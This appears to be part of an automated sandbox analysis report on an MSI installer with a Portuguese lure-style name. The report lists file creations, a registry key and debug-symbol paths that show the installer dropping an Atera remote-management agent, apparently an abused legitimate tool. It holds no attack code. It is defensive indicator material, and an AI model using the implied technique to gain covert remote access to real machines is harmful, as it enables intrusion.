                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\hostJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxrJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.32Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\dotnet.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\ThirdPartyNotices.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiStatic file information: File size 2994176 > 1048576
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exet.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134241384.00000165B08F2000.00000002.00000001.01000000.00000036.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.DataSetExtensions\net6.0-Release\System.Data.DataSetExtensions.pdb source: System.Data.DataSetExtensions.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdby source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb62P2 B2_CorDllMainmscoree.dll source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb5` source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbdq source: AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb' source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdbSHA256 source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.OpenSsl\net6.0-Release\System.Security.Cryptography.OpenSsl.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2140375764.000002139AA62000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.dr
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdben source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdbq$ source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbcccGCTL source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: ent.pdb0Pf source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdb source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\net6.0-Release\System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.2.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: System.Threading.Tasks.dll.26.dr
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdbSHA256 source: System.Buffers.dll.26.dr
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdbJ source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.Security.Cryptography.OpenSsl.ni.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageADRemote\AgentPackageADRemote\obj\Release\AgentPackageADRemote.pdb source: AgentPackageADRemote.exe.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscorrc\mscorrc.pdb source: mscorrc.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\net6.0-Release\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 00000037.00000000.1996426946.000001CC122B2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1828913877.0000022AD9272000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdb source: System.Buffers.dll.26.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: lib.pdb source: AgentPackageMonitoring.exe, 0000003D.00000002.2467763966.000001327BEBF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates\obj\Release\AgentPackageOsUpdates.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdbr source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
